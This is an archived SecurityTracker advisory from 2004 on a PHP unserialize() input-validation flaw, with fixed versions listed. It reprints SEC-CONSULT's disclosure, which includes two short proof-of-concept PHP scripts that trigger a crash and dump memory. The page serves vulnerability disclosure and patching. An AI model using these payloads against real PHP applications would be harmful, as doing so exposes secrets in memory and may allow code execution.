SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Php Vendors:  PHP Group
PHP serialize() May Let Users Execute Arbitrary Code or View Memory Contents
SecurityTracker Alert ID:  1012568
SecurityTracker URL:  http://securitytracker.com/id?1012568
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Dec 16 2004
Original Entry Date:  Dec 16 2004
Impact:  Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 4.3.10 and 5.0.3; tested on 4.3.9
Description:  A vulnerability was reported in PHP in the unserialize() function. A script may be able to execute arbitrary code or obtain portions of memory.

Martin Eiszner of SEC-CONSULT reported that the unserialize() function does not properly validate serialized strings. As a result, a specially crafted PHP script may be able to access portions of PHP memory or execute arbitrary code on the target system.

A demonstration exploit script is provided:

<?
$s = 's:9999999:"A";"';
$a = unserialize($s);
print $a;
?>

If a PHP script allows remote users to supply data (e.g., via cookies) to be processed by unserialize(), this vulnerability may be exploited by remote users, depending on the PHP application.

The vendor was notified on November 19, 2004.
Impact:  A script may be able to execute arbitrary code or obtain portions of memory.
Solution:  The vendor has released fixed versions (4.3.10 and 5.0.3), available at:

http://www.php.net/downloads.php

[Editor's note: Stefan Esser reports that these bugs were corrected in CVS several months ago.]
Vendor URL:  www.php.net/ (Links to External Site)
Cause:  Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Martin Eiszner <martin@websec.org>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jan 14 2005 (Conectiva Issues Fix) PHP serialize() May Let Users Execute Arbitrary Code or View Memory Contents   (Conectiva Updates <secure@conectiva.com.br>)
Conectiva has released a fix.


 Source Message Contents
Date:  Wed, 15 Dec 2004 22:32:54 +0100
From:  Martin Eiszner <martin@websec.org>
Subject:  php unserialize

 


==============================================================
SEC-CONSULT Security Advisory PHP - 4.3.9 unserialize function
======================OOOOOOOOOOOO============================

Product:        PHP 4.3.9 (Win32/Unix)
Remarks:        no other Versions tested but very likely vulnerable

Vulnerablities:

- Data Segment memory corruption
- Information disclosure / Memory dumping

Vendor:         PHP (http://www.php.net/)
Vendor-Status:  vendor contacted (19.11.2004)
Vendor-Patchs:  vendor has released bugfixed versions

Object: ---

Exploitable:
Local:          ---
Remote:         PARTIAL (OS-dependent)

============
Introduction
============

Visit "http://www.php.net" for additional information.


=====================
Vulnerability Details
=====================


1) Memory Corruption / buffer overflow
======================================

FUNCTION:
unserialize (http://at.php.net/manual/en/function.unserialize.php)

DESCRIPTION:
Insufficient input validation of serialized strings lead to memory corruption and information disclos
re.

EXAMPLE script - "Segfault":
---cut here---
<?
$s = 's:9999999:"A";"';
$a = unserialize($s);
print $a;
?>
---cut here---

REMARKS:
leads to arbitrary code execution and file/information disclosure.


EXAMPLE script - "Memory Dump":
---cut here---
<?
// session- and stuff
$secret_username="uaaaa";
$secret_password="hoschi";

// stuff
// $c = $_COOKIE ['crypted_stuff']
// $c = some cookie
/* simplyfied --> userinput */ $c = 's:30000:"crap";';

$userdata = unserialize($c);
//
// check $userdata stuff
// for some reason output $userdata
print $userdata . "\n is NOT valid !!\n";

// stuff
?>
---cut here---


REMARKS:
Could theoretically be used to circumvent safe-mode and/or gain sensitive information about script- a
nd memory areas.


===============
GENERAL REMARKS
===============
We would like to apologize in advance for potential nonconformities and/or known issues.

=====================================================================================================
====================
FOR SOME STRANGE REASONS HARDENED-PHP.NET HAS RELEASED THIS ADVISORY TODAY TOGETHER WITH A BUNCH OF O
THER VULNERABILITIES
=====================================================================================================
====================

====================
Recommended Hotfixes
====================

Vendor-Patches: vendor has released bugfixed versions

=======
Contact
=======

SEC-CONSULT
Austria / EUROPE
m.eiszner@sec-consult.com


EOF Martin Eiszner / @2004m.eiszner@sec-consult.com


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC